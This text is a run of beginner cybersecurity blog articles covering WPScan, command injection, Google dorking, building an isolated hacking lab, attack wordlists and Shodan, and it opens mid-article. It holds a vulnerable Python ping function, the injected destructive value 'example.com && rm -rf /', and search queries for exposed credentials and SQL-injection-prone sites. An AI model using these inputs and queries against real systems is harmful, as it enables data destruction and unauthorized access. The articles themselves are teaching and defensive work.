Use security plugins with real-time monitoring to notify you of suspicious activities in between WPScan checks.

Communicate with Your Team:

You’ll want to make sure you share reports with relevant team members, such as developers or site administrators, so everyone is aware of potential vulnerabilities.

It’s also a good idea to establish protocols for immediate action if critical vulnerabilities are discovered.

By choosing scans based on your site’s specific needs and implementing a structured approach to monitoring results, you can ensure WPScan is used effectively. Also, make sure you tailor the tool to your risk profile, track vulnerabilities over time, and integrate its findings into a broader security strategy.

This approach not only improves your site’s security posture but also minimizes resource use and effort while delivering maximum protection.

Conclusion

WPScan is an invaluable tool for anyone managing a WordPress site. It simplifies the process of identifying vulnerabilities and provides clear, actionable recommendations to strengthen your site’s security.

By integrating WPScan into your workflow and following best practices, you can reduce the risk of attacks and keep your WordPress site safe. Security is a continuous journey, and tools like WPScan make it easier to stay ahead of potential threats.

Hackers use it to run harmful commands on a system, gain access to sensitive data, take control of servers, or even shut down entire networks.

But how does it really work? And why is it such a big problem? Let’s break it down in simple terms.

What Is Command Execution?

Imagine a computer program that allows you to input something — like a website address or a file name — and then perform an action based on that input.

For example, a web tool might allow you to type in a domain name and then run a “ping” command to check if the site is online. Sounds useful, right?

Here’s where the problem starts: if the program doesn’t properly control or clean up what you enter, a hacker could type something unexpected — like a command that deletes all files on the system.

Instead of just doing what the program was designed to do, the hacker’s command gets executed as if it were legitimate.

Let’s look at an example of bad code:

import os

def ping_host(domain):
    os.system(f"ping {domain}")

Here’s what’s happening:

• You enter a domain like “example.com”.

• The program runs the ping command on the system, which sends test messages to "example.com" to check if it’s reachable.

The issue is that the program doesn’t limit what you can enter. If someone malicious enters something like example.com && rm -rf /, it might execute both the ping command and the rm -rf / command, which wipes out all the files on the computer.

Below is an example of injecting the hostname command which displays the system information.

That’s command execution in a nutshell — when user input is misused to run unplanned system commands.

Types of Command Execution Attacks

There are two main ways hackers use command execution to attack systems: command injection and remote code execution (RCE).

Command Injection

This is the easier type of attack. Hackers “inject” extra commands into a program by adding unexpected text to a field that accepts user input. The example above, where a hacker adds && rm -rf / to the domain name, is a classic example of command injection.

Hackers use this technique to read sensitive files, delete important data, or steal information from the system.

Remote Code Execution (RCE)

This is the more serious version. With RCE, a hacker doesn’t just run commands — they can upload and run entire scripts or programs on the system.

It’s like giving a hacker the keys to your computer, letting them do whatever they want.

For example, imagine an attacker uploads a small program that secretly listens to their commands. They could then use that program to install ransomware, spy on users, or take full control of the system.

Real-Life Examples of Command Execution Attacks

Let’s look at a couple of real-world cases where command execution vulnerabilities caused major damage.

The Shellshock Bug (2014)

The Shellshock bug was a massive vulnerability found in the Bash shell (a program used in many Unix-based systems). Hackers could inject commands into environment variables, tricking the system into running them.

Shellshock allowed attackers to take over servers, steal data, and launch large-scale attacks. This vulnerability was so serious that it affected millions of systems worldwide and required immediate patches.

Cisco Security Flaw (2020)

In 2020, a vulnerability was found in Cisco’s firewall devices. This flaw let hackers execute commands on the devices remotely, gaining full control of them.

Since these firewalls are used to protect sensitive networks, the vulnerability posed a major risk to businesses and organizations.

How to Protect Yourself From Command Execution Attacks

Protecting yourself from command execution vulnerabilities is all about following good practices.

1. Always Sanitize User Input—Think of every user input as a potential threat. For example, if a form asks for a name, a hacker might input something like rm -rf /. To stop this, you can use functions that strip out dangerous characters.

2. Avoid Running System Commands—Running commands directly from your application can be risky. Instead of using something like os.system('ls') in Python, use subprocess.run() with shell=False. This way, even if someone tries to inject harmful commands, they won’t run because the shell isn’t involved.

3. Limit What Programs Can Do—Make sure your programs only have the permissions they truly need. For example, if an application doesn't need to modify system files, don’t let it have write access to them.

4. Keep Everything Updated—Hackers love old software because it’s like a broken lock. By updating your operating system and libraries regularly, you patch known vulnerabilities. For instance, the infamous Shellshock bug in Bash affected outdated systems but was fixed in later versions.

5. Test for Vulnerabilities—Before someone else finds the holes in your system, test it yourself. Tools like Burp Suite or OWASP ZAP are helpful for automated scanning. For example, you can simulate attacks to see how your web app reacts and fix issues before they’re exploited.

6. Watch Your Logs—Logs are like security cameras for your server. If you see something odd, like a lot of failed login attempts or commands you didn’t authorize, it’s a red flag. Set up alerts to catch these signs early.

By following these best practices, you’ll make your systems much harder to break into.

Summary

Command execution vulnerabilities are one of the most powerful tools hackers can use. By exploiting them, attackers can completely control a system, steal sensitive information, or cause massive damage. Understanding this vulnerability is a key step in learning how to defend systems.

Want some real-world experience in cybersecurity? Try our five-day Hacker’s Headstart boot camp. Happy hacking!

The internet holds vast amounts of information. Much of this information is accessible through Google.

But did you know you can use Google in ways beyond simple searches? There’s a method called “Google Dorking” that lets you do this.

Google Dorking helps you find hidden or overlooked data on websites. It uses advanced search operators to locate hidden files, sensitive data, and more.

Google Dorking allows us to be very specific with our searches. Instead of just typing in regular keywords, we combine them with operators. These operators help Google narrow down its search results.

Before we dive in, a word of caution. While Google Dorking can be a powerful tool for research or cybersecurity testing, it also carries some risks. Using it for unauthorized access to secure information is illegal. So use it safely and correctly!

Now let’s learn how to “dork” Google.

Google Dorking Operators

Here’s a list of every common Google Dorking operator along with its purpose.

Site

Restricts search results to a specific domain or website. Example: site:example.com will show results only from that site.

InTitle

Searches for pages with a specific word or phrase in the page title. Example: intitle:login will find pages with "login" in the title.

InURL

The inurl operator is used to find specific words within the URL structure of web pages. It can help locate pages with particular keywords embedded in their web address.

For example, using inurl:login with other terms like inurl:customer or inurl:secure can reveal login pages for different sites.

An example of its use is inurl:admin. This displays URLs containing “admin,” often leading to administrative or management pages.

For more advanced searches, inurl:pho?id= can be useful to identify sites that might be vulnerable to SQL injection. URLs structured this way often include database query strings.

FileType

The filetype operator enables users to search for documents with a specific file extension. This includes extensions like PDF, DOC, or XLS.

The filetype operator makes it helpful for locating publicly accessible reports, presentations, and documents. For instance, filetype:pdf financial report finds PDF files related to financial reporting.

Combining filetype with certain keywords allows for more targeted searches. For example, searching filetype:xlsx budget could find Excel files related to budget details.

filetype:docx confidential might reveal DOCX documents containing potentially sensitive terms like “confidential,” leading to internal-use files that may be accessible publicly.

Cache

Shows Google’s cached version of a webpage, even if it’s been removed. Example: cache:example.com shows the cached version of that page.

AllInText

Searches for pages that contain all the specified words in the body text. Example: allintext:"username password" will return pages with both words in the text.

AllInTitle

Searches for pages with all specified words in the title. Example: allintitle:login admin finds pages with both words in the title.

AllInUrl

Searches for pages with multiple specified words in the URL. Example: allinurl:admin login finds URLs that contain both "admin" and "login."

InAnchor

Finds pages with specific text in anchor links (the clickable text of a link). Example: inanchor:"click here" finds links where the clickable text is "click here."

Before and After

Finds pages published before or after a specific date. Example: before:2020 will find pages published before 2020. after:2020 will find pages published after 2020.

OR

Combines two search terms and returns results containing either of them. Example: admin OR login shows pages with either "admin" or "login."

Minus (-)

Excludes specific words from the search results. Example: admin -login shows pages with “admin” but without “login.”

Asterisk (*)

Acts as a wildcard to substitute any word or phrase. Example: "admin * login" will find pages with any word between "admin" and "login."

InText

Searches for specific words in the main body of the page, not just titles or URLs. Example: intext:"confidential" finds pages where "confidential" appears in the content.

Location

Restricts results to a specific geographical location. Example: location:USA shows results focused on the USA.

How to Protect Yourself from Google Dorking

If you own a website or manage sensitive information online, understanding Google Dorking can help you secure your data. Here are some steps you can take to protect yourself:

1. Use Robots.txt Files The robots.txt file on a website tells search engines what content they shouldn’t index. Make sure that sensitive web pages or files are protected from being indexed by Google.

2. Use Password Protection If certain parts of your website are sensitive, use password protection. Google can’t access password-protected content, so it won’t show up in search results.

3. Avoid Storing Sensitive Files Publicly Do not store sensitive information like database backups, configuration files, or email lists on publicly accessible parts of your server.

4. Regularly Check for Exposed Information Use your own Google Dorking searches to see if sensitive files are showing up on Google. This can help you catch and secure information before anyone else finds it.

5. Use Web Vulnerability Scanners Tools like OWASP ZAP or Burp Suite can help you scan your own site for exposed data. These tools may catch things that you might overlook manually.

Conclusion

Google Dorking can be both helpful and dangerous, depending on how you use it. On one hand, it lets you uncover hidden information and refine your search skills. On the other, it can expose sensitive data if used irresponsibly.

Understanding the techniques of Google Dorking can make you a better internet user and help you secure your own data.

To learn how to hack machines in the real world, join our private community Hacker's Hub.

Setting up a virtual lab for hacking is a great way to sharpen your skills in a safe environment. A private lab ensures that all your activities remain isolated, so there’s no risk of harming real systems or violating legal boundaries. It allows you to make mistakes and learn from them without causing harm.

Project Setup

This guide will teach you how to set up your own private lab. To do this, we’ll need three things:

• Virtualization software

• Attacking Machine

• Target Machine

Virtualization software allows one physical computer to run multiple virtual machines (VMs). A virtual machine acts like a separate computer with its own operating system and programs but runs on the same hardware as the host computer.

VirtualBox is a popular virtualization software. VMware is another alternative.

To practice hacking, you need two machines — an attacking machine and a target machine.

You can use your own system as the attacking machine. But it is better to use a machine like Kali or Parrot which comes pre-installed with all the tools you will need.

For the target machine, we can use a repository like Vulnhub. It contains several VMs built for you to practise your skills. Each one is designed to have a vulnerability that you can practise exploiting.

The downloads required for this setup are quite large, so I recommend you download and keep them ready.

• Download VirtualBox (download the extension pack as well)

• Download Kali (64-bit Virtualbox image)

• Download Mr Robot vulnerable machine

Let’s go 👉

How to Install VirtualBox

To download VirtualBox, go to the downloads page. Based on your operating system, download the package and install it.

Once installation is complete, you should see a similar page depending on your operating system.

Double-click on the extension pack and make sure its installed as well.

How to Install Kali Linux

Now let’s install our attacking machine. Extract the .7z file from the Kali Linux download. Then click the green “Add” icon on the VirtualBox interface and point to the .vbox file.

All the default settings will be applied and you should have the attacking machine installed. If you are stuck, you can find detailed instructions here.

Don’t start the machine yet. Let’s add the target machine as well, followed by changing a few networking settings. Then we can start hacking.

How to Install a Target VM

Now let’s install the target. Double-click on the downloaded mrRobot.ova file. Use the default settings and click “Finish”.

Once both the attacking and target machines are setup, you should see them both in the machines list.

Now let’s update the network settings to make sure our VMs are secure.

Update Networking Settings

There are many ways to set up a network in VirtualBox. But in our case, we want to isolate our lab from the public internet. The best way to do this is to set up a host-only network.

In a host-only network, the VMs can communicate with each other but not the public internet. Let’s set it up.

In the Virtualbox interface, click on “Tools” and click “Host-only Networks”. Then click “Create”. It will automatically create a host only network with an IP range. For simplicity, let’s change the network’s name to “MyHackingLabNetwork”.

Click “Apply”. Now we have a host only network. Next, let’s configure our virtual machines to connect to this network.

Click on the Virtual Machine and click “Settings” icon. Under “Network”, choose “host-only network” and choose the name as “MyHackingLabNetwork”. Click “OK” once done.

Do the same for the target machine. The IP addresses for these virtual machines will automatically be assigned by our “host-only” network.

Scanning the Target

Now we are ready to go. Power on both machines.

Note: Both machines will show a default option to startup – just press enter. If the VM looks small on your screen, click View -> Scaled Mode on the top menu.

The username and password for the Kali machine is “kali”.

You should see the Kali Linux UI as below.

For the Mr.Robot box, you should see the following UI:

Now let’s find the IP addresses of these machines.

In Kali, open a terminal and type ifconfig | grep inet.

You should see an IP address similar to 192.168.56.x. This is the IP of the target machine.

Now let’s use nmap to scan for other machines in this network. If you don't know what Nmap is, here is a tutorial.

Let’s do a ping scan from Kali to look for other machines in the network. Run the following command:

nmap -sn 192.168.56.0/24

This command pings all IP addresses from 192.168.56.1 to 192.168.56.254 to see what is up and running. You should see three similar results.

The first result is usually the IP of the adapter. So we can ignore it. Out of the two, one of them is the IP of our attack machine. We are interested in the third. In this case, its 192.168.56.3.

Let’s do a service version scan of this IP and see what comes up.

nmap -sV 192.168.56.3

You should see a similar result as below if you are scanning the Mr.Robot virtual machine:

The above image shows that there are three ports on the server. One of them is ssh, which is closed. The other two are web server ports – 80 for http and 443 for https.

Conclusion

Congratulations! You’ve successfully set up your own hacking lab using VMware. This lab gives you the flexibility to practice ethical hacking in a controlled, isolated environment.

For more free tutorials on cybersecurity, join our newsletter. To learn how to hack the Mr.Robot and other boxes, join our private community Hacker’s Hub. If you are starting out in Cybersecurity, check out the Hacker’s Handbook.

See you soon with another article.

Imagine that you’re a security professional who’s performing a penetration test on a client’s website. Your job is to find potential weak points in their security. After running some basic scans, you notice that the login form looks vulnerable.

It lacks rate limiting and strong password protections. So, you might be able to try multiple passwords without being locked out. This is where a wordlist comes into play.

Instead of guessing random passwords one by one, you can use a pre-made wordlist. The list will contain thousands or even millions of potential passwords.

You can combine this wordlist with a brute-force tool like Hydra to perform an attack. The tool goes through the wordlist, testing each password against the login form. After a while, you hit a match. You’ve just cracked the login.

As an ethical hacker, you would notify the client of the weak password policy. You could then suggest stronger security measures to avoid this scenario. But this shows how critical wordlists can be when it comes to exploiting weak login systems.

In this article, we’ll look at wordlists in detail. We’ll cover what they are and a few use cases along with some popular wordlists.

What are Wordlists?

Wordlists are exactly what they sound like: lists of words. In cybersecurity, these words represent passwords, usernames, or even URLs.

Wordlists can be simple collections of common passwords like “123456” or “password”. Or they can be custom lists generated to target specific systems.

Penetration testers feed these wordlists into tools that let them test multiple inputs quickly. These tools include password-cracking software, brute-forcing scripts, or directory scanners. The wordlist acts as the source of input, trying each word against the target in an attempt to find a match.

How are Wordlists Used?

Let’s look at a few common scenarios where wordlists can be useful.

Password Cracking

One of the most common uses of wordlists is password cracking. Attackers feed a wordlist into tools like John the Ripper or Hashcat. These tools then test each word against a password hash to find a match.

Let’s assume that a hacker finds hashed passwords from a compromised database. They can use a wordlist to attempt to reverse those hashes into the original passwords.

Modern security practices encourage complex passwords. But many people still use weak, common passwords. Wordlists exploit this human tendency by including frequently used passwords.

One of the most famous password wordlists in the hacking community is Rockyou.txt. It has 14 million passwords collected after the site Rockyou.com was breached by hackers. Here is the full wordlist.

Username Enumeration

In some systems, knowing the correct username is half the battle. Hackers often use wordlists to enumerate usernames before attempting a password attack. It works by submitting different usernames to a login form and watching the system’s response.

For example, some systems will return an error message like “Username not found”. A well-crafted wordlist of usernames allows you to quickly discover which accounts exist.

A username wordlist can help in this type of scenario. It doesn’t have to be long like a password wordlist. But a list of common usernames would help. Here is one such wordlist.

Directory and File Enumeration

When testing a web app, it’s important to find hidden files and directories. They may not be publicly listed. And these hidden URLs may reveal sensitive information or hidden functionality.

Tools like Gobuster or Dirbuster use wordlists to automate this process. They try each word in the wordlist as a potential directory or file name.

For example, testing a wordlist on a website could find a hidden admin panel at /admin, or a backup file at /backup.zip. This can be useful for finding unintended exposures.

Here is a sample directory wordlist.

Subdomain Enumeration

Subdomain enumeration involves finding all the subdomains associated with a target website. Like hidden pages, subdomains can also contain useful and sensitive information.

For example, a product at product.com can contain a development server at dev.product.com. Or an admin panel at admin.product.com. These subdomains might not be well protected like the main website.

Tools like Sublist3r and Amass are popular for this task. Here is a subdomain wordlist for these types of attacks.

How to Create Custom Wordlists

Sometimes, general wordlists aren’t enough. For specific engagements, it’s worth creating your own wordlist tailored to the target.

For example, if you’re pentesting for a company, you might build a custom wordlist for that company. It can have employee names, department names, or relevant terms unique to that company.

Several tools help you create custom wordlists.

• CeWL (custom wordlist generator) — generates wordlists by scraping text from a website specific to the target.

• Crunch — creates wordlists by mixing and matching the characters that you provide.

Conclusion

Wordlists are powerful tools that every cybersecurity professional should have in their arsenal. They simplify complex tasks like password cracking, brute-forcing, and directory enumeration. The right wordlist can save you hours and help find vulnerabilities quickly and efficiently.

Hope this tutorial helped you understand how to use wordlists. For more articles on Cybersecurity, join our free newsletter Stealth Security. To learn hacking using hands-on labs, check out our private community The Hacker’s Hub.

When you hear the term “search engine,” your mind likely jumps to Google, Bing, or Yahoo. These platforms are familiar to most of us, helping us find websites, images, and news.

But there’s another search engine out there, one that most people have never heard of. And it’s a lot more powerful and dangerous. It’s called Shodan.

Shodan is a database of online devices, many of which are not meant to be public. The scary thing about Shodan is that it can have one of your devices, too.

Let’s look at what Shodan is, how it works, and why it’s both a valuable tool and a potential threat.

What is Shodan?

Shodan is a search engine that discovers devices connected to the internet. This includes everything from simple webcams and routers to complex industrial control systems.

Traditional search engines index websites. Shodan scans the internet for devices and lists them based on their IP addresses, open ports, and other publicly available data.

Shodan works by scanning the internet using specific protocols to identify connected devices. It collects all information about the device.

These include IP addresses, open ports, and even the software versions in use. This data is then made searchable by allowing users to query the database. You can look for specific types of devices or vulnerabilities using Shodan’s UI or the CLI tool.

Let’s look at how you can use Shodan both via the web interface and the command line.

How to Use the Shodan Web Interface

Go to shodan.io and create an account. While some searches are possible without an account, you’ll need to log in to access most features.

Also, you will need a premium account to find most devices, and the results of the free plan are very limited.

On the homepage, you will see a simple search bar. You can type in general queries like “default password” or “webcam” to see what Shodan can find.

For example, typing “default password” will list devices with default settings. They are vulnerable to unauthorized access.

Shodan also allows you to filter results with specific parameters. For example:

• Search for specific devices: If you’re looking for webcams, you might type “webcam country:US”. This query will return webcams located in the United States.

• Search by IP address: To see details about a specific IP, type the IP address into the search bar.

• Search by port: To find devices with a specific port open, use a query like “port:22”. This will find devices with SSH (port 22) exposed to the Internet.

After executing a search, Shodan will present a list of matching devices. Each result includes the IP address, open ports, and the software on the device.

For example, a search for “port:22” might find SSH servers and their configuration details.

How to Use the Shodan Command-Line Interface (CLI)

For advanced users, Shodan provides a command-line interface (CLI). It lets you search and automate tasks.

Note: API usage may be limited based on your account and you might have to pay to use it.

Before you can use the CLI, you will need to install it. You can do this using Python’s package manager, pip. Open your terminal and type the following.

pip install shodan

Once installed, you can see if it works by trying the help command.

shodan -h

Now you have to add your Shodan CLI with your API key. You can find your API key on your Shodan account page. To set it up, use the following command:

shodan init YOUR_API_KEY

Now you can start searching. Here’s an example of a basic search:

shodan search "default password"

This command will return devices with “default password” in their banners. This often indicates poor security practices.

You can search for devices with specific characteristics as before:

shodan search "port:80 country:US"

This command finds web servers (port 80) located in the United States.

To get detailed information about a specific IP address, use this command:

shodan host 8.8.8.8

It will return all known data about the specified IP. This includes open ports and detected services.

To see more commands or debug CLI issues, here is the official documentation from Shodan.

The Good, the Bad, and the Dangerous

Shodan is a double-edged sword. It’s a powerful tool for cybersecurity professionals. It also poses significant risks if used with bad intent.

Security teams use Shodan to find exposed devices within their networks. It allows them to patch vulnerabilities before someone can exploit them.

Researchers can track vulnerabilities or malware by monitoring devices on Shodan.

Unfortunately, Shodan can also be a hacker’s dream. Hackers can use Shodan to locate devices exposed to the Internet. These include webcams, servers, and even industrial control systems.

A worrying fact about Shodan is its ability to find industrial control systems. An Industrial Control System (ICS) controls and monitors industrial processes. It’s the “brain” behind machines in factories, power plants, and water treatment plants.

Shodan has found thousands of unsecured, internet-connected industrial control systems (ICS). In some cases, these systems had no password or used default credentials.

Shodan has also indexed thousands of security cameras, database servers, and IoT devices. These raise serious privacy and security concerns. All these can be easily exploited if not properly secured.

To protect your own devices, you must understand Shodan. You need to know how it works and what it can find.

So, how can you prevent Shodan from exposing your devices?

1. Change Default Credentials: Always change the default usernames and passwords on your devices.

2. Use Strong Passwords: Avoid weak passwords. Use a mix of letters, numbers, and symbols, and consider using a password manager.

3. Disable Unnecessary Services: If your device has services you don’t use, disable them. This reduces the number of potential vulnerabilities.

Conclusion

Shodan is a powerful tool. It’s a reminder that any device connected to the internet is potentially exposed. It offers useful insights for cybersecurity experts but also an opportunity for cybercriminals.

Knowing what Shodan can do should make you take cybersecurity seriously. In a world where everything is connected, your security is only as strong as your weakest device. Stay informed, stay updated, and most importantly, stay safe.

Join the Stealth Security newsletter for more articles on offensive and defensive cybersecurity. To learn how to build a career in Cybersecurity, check out The Hacker's Handbook.